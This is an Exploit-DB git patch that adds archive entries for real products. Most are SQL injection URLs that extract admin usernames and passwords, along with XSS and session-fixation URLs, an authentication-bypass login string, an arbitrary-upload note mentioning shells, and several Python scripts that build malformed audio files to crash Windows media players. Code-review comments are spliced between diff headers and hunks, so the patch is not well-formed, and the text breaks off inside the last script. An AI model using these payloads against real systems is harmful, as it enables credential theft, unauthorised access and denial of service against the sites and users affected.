From 06a026f6dd3c57b769911c2be355fec67e117040 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Wed, 26 Mar 2014 04:30:57 +0000 Subject: [PATCH] Updated 03_26_2014 --- files.csv | 23 +++++++++++++++++ platforms/asp/webapps/32485.txt | 7 +++++ platforms/asp/webapps/32498.txt | 7 +++++ platforms/asp/webapps/32500.txt | 9 +++++++ platforms/linux/dos/32452.txt | 20 +++++++++++++++ platforms/php/webapps/32479.txt | 14 ++++++++++ platforms/php/webapps/32486.txt | 7 +++++ platforms/php/webapps/32487.txt | 17 ++++++++++++ platforms/php/webapps/32488.txt | 11 ++++++++ platforms/php/webapps/32490.txt | 9 +++++++ platforms/php/webapps/32492.txt | 9 +++++++ platforms/php/webapps/32494.txt | 7 +++++ platforms/php/webapps/32495.txt | 9 +++++++ platforms/php/webapps/32496.txt | 9 +++++++ platforms/php/webapps/32497.txt | 7 +++++ platforms/php/webapps/32499.txt | 9 +++++++ platforms/windows/dos/32477.py | 40 +++++++++++++++++++++++++++++ platforms/windows/dos/32478.py | 40 +++++++++++++++++++++++++++++ platforms/windows/dos/32481.txt | 40 +++++++++++++++++++++++++++++ platforms/windows/dos/32482.py | 39 ++++++++++++++++++++++++++++ platforms/windows/dos/32483.py | 39 ++++++++++++++++++++++++++++ platforms/windows/remote/32489.txt | 11 ++++++++ platforms/windows/remote/32491.html | 7 +++++ platforms/windows/remote/32493.html | 11 ++++++++ 24 files changed, 401 insertions(+) create mode 100755 platforms/asp/webapps/32485.txt create mode 100755 platforms/asp/webapps/32498.txt create mode 100755 platforms/asp/webapps/32500.txt create mode 100755 platforms/linux/dos/32452.txt create mode 100755 platforms/php/webapps/32479.txt create mode 100755 platforms/php/webapps/32486.txt create mode 100755 platforms/php/webapps/32487.txt create mode 100755 platforms/php/webapps/32488.txt create mode 100755 platforms/php/webapps/32490.txt create mode 100755 platforms/php/webapps/32492.txt create mode 100755 platforms/php/webapps/32494.txt create mode 100755 platforms/php/webapps/32495.txt create mode 100755 platforms/php/webapps/32496.txt create mode 100755 
platforms/php/webapps/32497.txt create mode 100755 platforms/php/webapps/32499.txt create mode 100755 platforms/windows/dos/32477.py create mode 100755 platforms/windows/dos/32478.py create mode 100755 platforms/windows/dos/32481.txt create mode 100755 platforms/windows/dos/32482.py create mode 100755 platforms/windows/dos/32483.py create mode 100755 platforms/windows/remote/32489.txt create mode 100755 platforms/windows/remote/32491.html create mode 100755 platforms/windows/remote/32493.html
diff --git a/files.csv b/files.csv
index eb8cc1d3b..96a88afdf 100755
--- a/files.csv
+++ b/files.csv
@@ -29217,6 +29217,7 @@ id,file,description,date,author,platform,type,port
 32449,platforms/php/webapps/32449.txt,"H-Sphere WebShell 4.3.10 'actions.php' Multiple Cross Site Scripting Vulnerabilities",2008-10-01,C1c4Tr1Z,php,webapps,0
 32450,platforms/php/webapps/32450.txt,"WikyBlog 1.7.1 Multiple Cross-Site Scripting Vulnerabilities",2008-10-01,"Omer Singer",php,webapps,0
 32451,platforms/linux/dos/32451.txt,"Fedora 8/9 Linux Kernel 'utrace_control' NULL Pointer Dereference Denial of Service Vulnerability",2008-10-02,"Michael Simms",linux,dos,0
+32452,platforms/linux/dos/32452.txt,"Adobe Flash Player 9/10 - SWF Version Null Pointer Dereference Denial of Service Vulnerability",2008-10-02,"Matthew Dempsky",linux,dos,0
 32453,platforms/php/webapps/32453.txt,"Dreamcost HostAdmin 3.1 'index.php' Cross-Site Scripting Vulnerability",2008-10-02,Am!r,php,webapps,0
 32454,platforms/unix/dos/32454.xml,"libxml2 Denial of Service Vulnerability",2008-10-02,"Christian Weiske",unix,dos,0
 32455,platforms/php/webapps/32455.pl,"Website Directory 'index.php' Cross-Site Scripting Vulnerability",2008-10-03,"Ghost Hacker",php,webapps,0
@@ -29240,3 +29241,25 @@ id,file,description,date,author,platform,type,port 32473,platforms/php/webapps/32473.txt,"'com_jeux' Joomla! Component 'id' Parameter SQL Injection Vulnerability",2008-10-11,H!tm@N,php,webapps,0 32474,platforms/php/webapps/32474.txt,"EEB-CMS 0.95 'index.php' Cross-Site Scripting Vulnerability",2008-10-11,d3v1l,php,webapps,0 32475,platforms/multiple/remote/32475.sql,"Oracle Database Server <= 11.1 'CREATE ANY DIRECTORY' Privilege Escalation Vulnerability",2008-10-13,"Paul M. Wright",multiple,remote,0 +32477,platforms/windows/dos/32477.py,"Windows Media Player 11.0.5721.5230 - Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0 +32478,platforms/windows/dos/32478.py,"jetVideo 8.1.1 - Basic (.wav) Local Crash PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0 +32479,platforms/php/webapps/32479.txt,"BigDump 0.35b - Arbitrary Upload",2014-03-24,"felipe andrian",php,webapps,0 +32481,platforms/windows/dos/32481.txt,"Light Audio Player 1.0.14 - Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0 +32482,platforms/windows/dos/32482.py,"GOM Media Player (GOMMP) 2.2.56.5183 - Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0 +32483,platforms/windows/dos/32483.py,"GOM Video Converter 1.1.0.60 - Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0 +32485,platforms/asp/webapps/32485.txt,"ASP Indir Iltaweb Alisveris Sistemi 'xurunler.asp' SQL Injection Vulnerability",2008-10-13,tRoot,asp,webapps,0 +32486,platforms/php/webapps/32486.txt,"Webscene eCommerce 'productlist.php' SQL Injection Vulnerability",2008-10-14,"Angela Chang",php,webapps,0 +32487,platforms/php/webapps/32487.txt,"Elxis CMS 2008.1 modules/mod_language.php Multiple Parameter XSS",2008-10-14,faithlove,php,webapps,0 +32488,platforms/php/webapps/32488.txt,"Elxis CMS 2008.1 PHPSESSID Variable Session Fixation",2008-10-14,faithlove,php,webapps,0 +32489,platforms/windows/remote/32489.txt,"Microsoft Outlook Web Access for Exchange Server 2003 
'redir.asp' URI Redirection Vulnerability",2008-10-15,"Martin Suess",windows,remote,0 +32490,platforms/php/webapps/32490.txt,"SweetCMS 1.5.2 'index.php' SQL Injection Vulnerability",2008-10-14,Dapirates,php,webapps,0 +32491,platforms/windows/remote/32491.html,"Hummingbird HostExplorer 6.2/8.0 ActiveX Control 'PlainTextPassword()' Buffer Overflow Vulnerability",2008-10-16,"Thomas Pollet",windows,remote,0 +32492,platforms/php/webapps/32492.txt,"Habari 0.5.1 'habari_username' Parameter Cross-Site Scripting Vulnerability",2008-10-16,faithlove,php,webapps,0 +32493,platforms/windows/remote/32493.html,"Hummingbird Deployment Wizard 10 'DeployRun.dll' ActiveX Control Multiple Security Vulnerabilities",2008-10-17,shinnai,windows,remote,0 +32494,platforms/php/webapps/32494.txt,"FlashChat 'connection.php' Role Filter Security Bypass Vulnerability",2008-10-17,eLiSiA,php,webapps,0 +32495,platforms/php/webapps/32495.txt,"Jetbox CMS 2.1 admin/cms/images.php orderby Parameter SQL Injection",2008-10-20,"Omer Singer",php,webapps,0 +32496,platforms/php/webapps/32496.txt,"Jetbox CMS 2.1 admin/cms/nav.php nav_id Parameter SQL Injection",2008-10-20,"Omer Singer",php,webapps,0 +32497,platforms/php/webapps/32497.txt,"PHP-Nuke Sarkilar Module 'id' Parameter SQL Injection Vulnerability",2008-10-20,r45c4l,php,webapps,0 +32498,platforms/asp/webapps/32498.txt,"Dizi Portali 'diziler.asp' SQL Injection Vulnerability",2008-10-21,"CyberGrup Lojistik",asp,webapps,0 +32499,platforms/php/webapps/32499.txt,"phPhotoGallery 0.92 'index.php' SQL Injection Vulnerability",2008-10-21,KnocKout,php,webapps,0 +32500,platforms/asp/webapps/32500.txt,"Bahar Download Script 2.0 'aspkat.asp' SQL Injection Vulnerability",2008-10-21,"CyberGrup Lojistik",asp,webapps,0 diff --git a/platforms/asp/webapps/32485.txt b/platforms/asp/webapps/32485.txt new file mode 100755 index 000000000..67284b78d --- /dev/null +++ b/platforms/asp/webapps/32485.txt 
@@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/31740/info + +ASP Indir Iltaweb Alisveris Sistemi is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data. + +A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/urunler.asp?catno=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 from users \ No newline at end of file diff --git a/platforms/asp/webapps/32498.txt b/platforms/asp/webapps/32498.txt new file mode 100755 index 000000000..fac30d7dd --- /dev/null +++ b/platforms/asp/webapps/32498.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/31849/info + +Dizi Portali is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/path/diziler.asp?id=[Sql Injection] \ No newline at end of file diff --git a/platforms/asp/webapps/32500.txt b/platforms/asp/webapps/32500.txt new file mode 100755 index 000000000..e0db9a8dd --- /dev/null +++ b/platforms/asp/webapps/32500.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31852/info + +Bahar Download Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data. + +A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Bahar Download Script 2.0 is vulnerable; other versions may also be affected. + +http://www.example.com/path/aspkat.asp?kid=-2%20union%20select%200,kullanici,parola,3,4,5,6,7,8,9,10,11,12,13,14,15,16%20from%20admin%20where%20id=1 \ No newline at end of file 
diff --git a/platforms/linux/dos/32452.txt b/platforms/linux/dos/32452.txt new file mode 100755 index 000000000..e07128c78 --- /dev/null +++ b/platforms/linux/dos/32452.txt @@ -0,0 +1,20 @@ +source: http://www.securityfocus.com/bid/31537/info + +Adobe Flash Player Plugin is prone to a remote denial-of-service vulnerability. + +Successfully exploiting this issue will allow attackers to crash the browser that uses the plugin, denying service to legitimate users. + +The following versions of Flash Player Plugin are vulnerable: + +9.0.45.0 +9.0.112.0 +9.0.124.0 +10.0.12.10 + +UPDATE (March 11, 2009): Flash Player Plugin 10.0.22.87 is vulnerable. + +UPDATE (September 4, 2009): Mac OS X 10.6 reportedly ships with Flash Player 10.0.23.1, which will overwrite any installed version of Flash Player when Mac OS X is being installed. + +UPDATE (June 10, 2010): Flash Player 10.1.53.64 and 9.0.227.0 are available. + +http://www.exploit-db.com/sploits/32452.zip \ No newline at end of file diff --git a/platforms/php/webapps/32479.txt b/platforms/php/webapps/32479.txt new file mode 100755 index 000000000..2b6e5d82b --- /dev/null +++ b/platforms/php/webapps/32479.txt @@ -0,0 +1,14 @@ +[+] Arbitrary Upload on BigDump v0.35b +[+] Date: 23/03/2014 +[+] Risk: High +[+] Author: Felipe Andrian Peixoto +[+] Vendor Homepage: http://www.ozerov.de/bigdump/ +[+] Contact: felipe_andrian@hotmail.com +[+] Tested on: Windows 7 and Linux +[+] Vulnerable File: bigdump.php +[+] Version: v0.35b +[+] Exploit : http://host/bigdump.php?start= +[+] PoC: http://SERVER/bigdump.php?start= + +Note: allows upload files and shells with tamperdate. + diff --git a/platforms/php/webapps/32486.txt b/platforms/php/webapps/32486.txt new file mode 100755 index 000000000..5cf53ad8d --- /dev/null +++ b/platforms/php/webapps/32486.txt 
@@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/31755/info + +Webscene eCommerce is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data. + +A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/productlist.php?categoryid=20&level=-4 union select concat(loginid,0x2f,password) from adminuser-- \ No newline at end of file diff --git a/platforms/php/webapps/32487.txt b/platforms/php/webapps/32487.txt new file mode 100755 index 000000000..1982a6331 --- /dev/null +++ b/platforms/php/webapps/32487.txt @@ -0,0 +1,17 @@ +source: http://www.securityfocus.com/bid/31764/info + +Elxis CMS is prone to multiple cross-site scripting and session-fixation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The application is also prone to a session-fixation vulnerability. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Using the session-fixation issue, the attacker can hijack the session and gain unauthorized access to the affected application. + +Elxis CMS 2006.1 is vulnerable; other versions may also be affected. + +http://www.example.net/index.php?>"> +http://www.example.net/index.php?option=>"> +http://www.example.net/index.php?option=com_poll&Itemid=>"> +http://www.example.net/index.php?option=com_poll&task=view&id=>"> +http://www.example.net/index.php?option=com_poll&Itemid=1&task=>"> +http://www.example.net/index.php?option=com_poll&task=view&bid=>"> +http://www.example.net/index.php?option=com_poll&Itemid=1&task=view&contact_id=>"> \ No newline at end of file 
diff --git a/platforms/php/webapps/32488.txt b/platforms/php/webapps/32488.txt new file mode 100755 index 000000000..25f32212c --- /dev/null +++ b/platforms/php/webapps/32488.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/31764/info + +Elxis CMS is prone to multiple cross-site scripting and session-fixation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The application is also prone to a session-fixation vulnerability. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Using the session-fixation issue, the attacker can hijack the session and gain unauthorized access to the affected application. + +Elxis CMS 2006.1 is vulnerable; other versions may also be affected. + +http://www.site.com/?PHPSESSID=[session_fixation] \ No newline at end of file diff --git a/platforms/php/webapps/32490.txt b/platforms/php/webapps/32490.txt new file mode 100755 index 000000000..573ec58be --- /dev/null +++ b/platforms/php/webapps/32490.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31774/info + +SweetCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data. + +A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +SweetCMS 1.5.2 is vulnerable; other versions may also be affected. + +http://www.example.com/index.php?page=3+AND+1=2+UNION+SELECT+0,concat(email,0x3a,password),2,3,4,5+from+users+limit+1,1-- \ No newline at end of file diff --git a/platforms/php/webapps/32492.txt b/platforms/php/webapps/32492.txt new file mode 100755 index 000000000..aed1b0508 --- /dev/null +++ b/platforms/php/webapps/32492.txt 
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31794/info + +Habari is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Habari 0.5.1 is affected; other versions may be vulnerable as well. + +http://www.example.com/user/login/?habari_username=>"> \ No newline at end of file diff --git a/platforms/php/webapps/32494.txt b/platforms/php/webapps/32494.txt new file mode 100755 index 000000000..4322ac55d --- /dev/null +++ b/platforms/php/webapps/32494.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/31800/info + +FlashChat is prone to a security-bypass vulnerability. + +An attacker can leverage this vulnerability to bypass certain security restrictions and gain unauthorized administrative access to the affected application. + +sendAndLoad=%5Btype%20Function%5D&s=7&t=&r=0&u=5581&b=3&c=banu&cid=1&id= \ No newline at end of file diff --git a/platforms/php/webapps/32495.txt b/platforms/php/webapps/32495.txt new file mode 100755 index 000000000..c5c5d2e0f --- /dev/null +++ b/platforms/php/webapps/32495.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31824/info + +Jetbox CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Jetbox CMS 2.1 is vulnerable; other versions may also be affected. + +http://www.example.com/admin/cms/images.php?orderby=[INJECTION POINT] \ No newline at end of file 
diff --git a/platforms/php/webapps/32496.txt b/platforms/php/webapps/32496.txt new file mode 100755 index 000000000..0e6d05845 --- /dev/null +++ b/platforms/php/webapps/32496.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31824/info + +Jetbox CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Jetbox CMS 2.1 is vulnerable; other versions may also be affected. + +http://www.example.com/path/admin/cms/nav.php?task=editrecord&nav_id=[INJECTION POINT] \ No newline at end of file diff --git a/platforms/php/webapps/32497.txt b/platforms/php/webapps/32497.txt new file mode 100755 index 000000000..5d36a743a --- /dev/null +++ b/platforms/php/webapps/32497.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/31830/info + +Sarkilar module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/modules.php?name=Sarkilar&op=showcontent&id=-1+union+select+null,null,pwd,email,user_uid,null,null,null,null+from+hebuname_authors-- \ No newline at end of file diff --git a/platforms/php/webapps/32499.txt b/platforms/php/webapps/32499.txt new file mode 100755 index 000000000..ed3926bd6 --- /dev/null +++ b/platforms/php/webapps/32499.txt 
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31850/info + +phPhotoGallery is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +phPhotoGallery 0.92 is affected; other versions may also be vulnerable. + +Username : ' or 1=1/*Password : ' or 1=1/* \ No newline at end of file diff --git a/platforms/windows/dos/32477.py b/platforms/windows/dos/32477.py new file mode 100755 index 000000000..1a1ce19ab --- /dev/null +++ b/platforms/windows/dos/32477.py 
@@ -0,0 +1,40 @@
+#!/usr/bin/python
+
+#[+] Author: TUNISIAN CYBER
+#[+] Exploit Title: Windows Media Player 11.0.5721.5230 Memory Corruption PoC
+#[+] Date: 22-03-2014
+#[+] Category: DoS/PoC
+#[+] Tested on: WinXp/Windows 7 Pro
+#[+] Vendor: http://windows.microsoft.com/fr-FR/windows/windows-media-player
+#[+] Friendly Sites: na3il.com,th3-creative.com
+#[+] Twitter: @TCYB3R
+
+import os
+os.system("color 02")
+
+print"###########################################################"
+print"# Title: WMP 11.0.5721.5230 Memory Corruption PoC #"
+print"# Author: TUNISIAN CYBER #"
+print"# Category: DoS/PoC # "
+print"###########################################################"
+
+header=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
+"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
+"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
+
+filename = "ms.wav"
+file = open(filename , "w")
+file.write(header)
+print "\n Files Created!\n"
+file.close()
\ No newline at end of file
diff --git a/platforms/windows/dos/32478.py b/platforms/windows/dos/32478.py
new file mode 100755
index 000000000..d421de2f0
--- /dev/null
+++ b/platforms/windows/dos/32478.py
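Review bot: The output file is opened in text mode and closed by hand (`file = open(filename , "w")` … `file.close()`) in 32477.py, and the identical pattern appears in 32478.py, 32481.txt, 32482.py and 32483.py; it should be `with open(filename, "wb") as out: out.write(header)` so that any 0x0A byte is not rewritten as CRLF on Windows and the handle is released even if the write raises (this particular header contains no 0x0A byte, so the output happens to be identical today). The local name `file` also shadows the builtin. The `print"..."` statements are Python 2 syntax under a generic `#!/usr/bin/python` shebang, so the script fails to parse under Python 3; `#!/usr/bin/env python2` would state the requirement. `os.system("color 02")` is a cmd.exe builtin and only emits a shell error on other platforms. A header comment such as `# Writes a Sun AU (".snd" magic) header to a .wav-named file` would document what the bytes are.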
@@ -0,0 +1,40 @@
+#!/usr/bin/python
+
+#[+] Author: TUNISIAN CYBER
+#[+] Exploit Title: jetVideo 8.1.1 Basic (.wav) Local Crash PoC
+#[+] Date: 22-03-2014
+#[+] Category: DoS/PoC
+#[+] Tested on: WinXp/Windows 7 Pro
+#[+] Vendor: http://www.jetaudio.com/download/jetvideo.html
+#[+] Friendly Sites: na3il.com,th3-creative.com
+#[+] Twitter: @TCYB3R
+
+import os
+os.system("color 02")
+
+print"###########################################################"
+print"# Title: Light jetVideo 8.1.1 Basic (.wav) Local Crash PoC#"
+print"# Author: TUNISIAN CYBER #"
+print"# Category: DoS/PoC # "
+print"###########################################################"
+
+header=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
+"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
+"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
+
+filename = "jet.wav"
+file = open(filename , "w")
+file.write(header)
+print "\n Files Created!\n"
+file.close()
\ No newline at end of file
diff --git a/platforms/windows/dos/32481.txt b/platforms/windows/dos/32481.txt
new file mode 100755
index 000000000..b85f52ae2
--- /dev/null
+++ b/platforms/windows/dos/32481.txt
@@ -0,0 +1,40 @@
+#!/usr/bin/python
+
+#[+] Author: TUNISIAN CYBER
+#[+] Exploit Title: Light Audio Player 1.0.14 Memory Corruption PoC
+#[+] Date: 22-03-2014
+#[+] Category: DoS/PoC
+#[+] Tested on: WinXp/Windows 7 Pro
+#[+] Vendor: http://download.cnet.com/Light-Audio-Player/3000-2139_4-10791618.html
+#[+] Friendly Sites: na3il.com,th3-creative.com
+#[+] Twitter: @TCYB3R
+
+import os
+os.system("color 02")
+
+print"###########################################################"
+print"# Title: Light Audio Player 1.0.14 Memory Corruption PoC #"
+print"# Author: TUNISIAN CYBER #"
+print"# Category: DoS/PoC # "
+print"###########################################################"
+
+header=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
+"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
+"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
+
+filename = "3vil.wav"
+file = open(filename , "w")
+file.write(header)
+print "\n Files Created!\n"
+file.close()
\ No newline at end of file
diff --git a/platforms/windows/dos/32482.py b/platforms/windows/dos/32482.py
new file mode 100755
index 000000000..e4e12a8a3
--- /dev/null
+++ b/platforms/windows/dos/32482.py
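Review bot: 32481.txt is a Python script (shebang `#!/usr/bin/python`, `print` statements, `open(...)`) committed under a `.txt` extension, and the files.csv row added in this commit indexes it as `platforms/windows/dos/32481.txt`, while its four siblings from the same batch are `.py`. The file and the index entry should both use `32481.py` so the archive's type metadata matches the content; if the `.txt` naming is deliberate, a first-line comment in the file should say why.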
@@ -0,0 +1,39 @@
+#!/usr/bin/python
+
+#[+] Author: TUNISIAN CYBER
+#[+] Exploit Title: GOMMP 2.2.56.5183 Memory Corruption PoC
+#[+] Date: 22-03-2014
+#[+] Category: DoS/PoC
+#[+] Tested on: WinXp/Windows 7 Pro
+#[+] Vendor: http://player.gomlab.com/eng/
+#[+] Friendly Sites: na3il.com,th3-creative.com
+#[+] Twitter: @TCYB3R
+
+
+print"###########################################################"
+print"# Title: GOMMP 2.2.56.5183 Memory Corruption PoC #"
+print"# Author: TUNISIAN CYBER #"
+print"# Category: DoS/PoC # "
+print"###########################################################"
+
+
+header=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
+"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
+"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
+
+filename = "3vil.wav"
+file = open(filename , "w")
+file.write(header)
+print "\n Done!\n"
+file.close()
\ No newline at end of file
diff --git a/platforms/windows/dos/32483.py b/platforms/windows/dos/32483.py
new file mode 100755
index 000000000..378352a3b
--- /dev/null
+++ b/platforms/windows/dos/32483.py
@@ -0,0 +1,39 @@
+#!/usr/bin/python
+
+#[+] Author: TUNISIAN CYBER
+#[+] Exploit Title: GOM Video Converter 1.1.0.60 Memory Corruption PoC
+#[+] Date: 22-03-2014
+#[+] Category: DoS/PoC
+#[+] Tested on: WinXp/Windows 7 Pro
+#[+] Vendor: http://converter.gomlab.com/
+#[+] Friendly Sites: na3il.com,th3-creative.com
+#[+] Twitter: @TCYB3R
+
+
+print"###########################################################"
+print"# Title: GOMVC 1.1.0.60 Memory Corruption PoC #"
+print"# Author: TUNISIAN CYBER #"
+print"# Category: DoS/PoC # "
+print"###########################################################"
+
+
+header=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
+"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
+"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
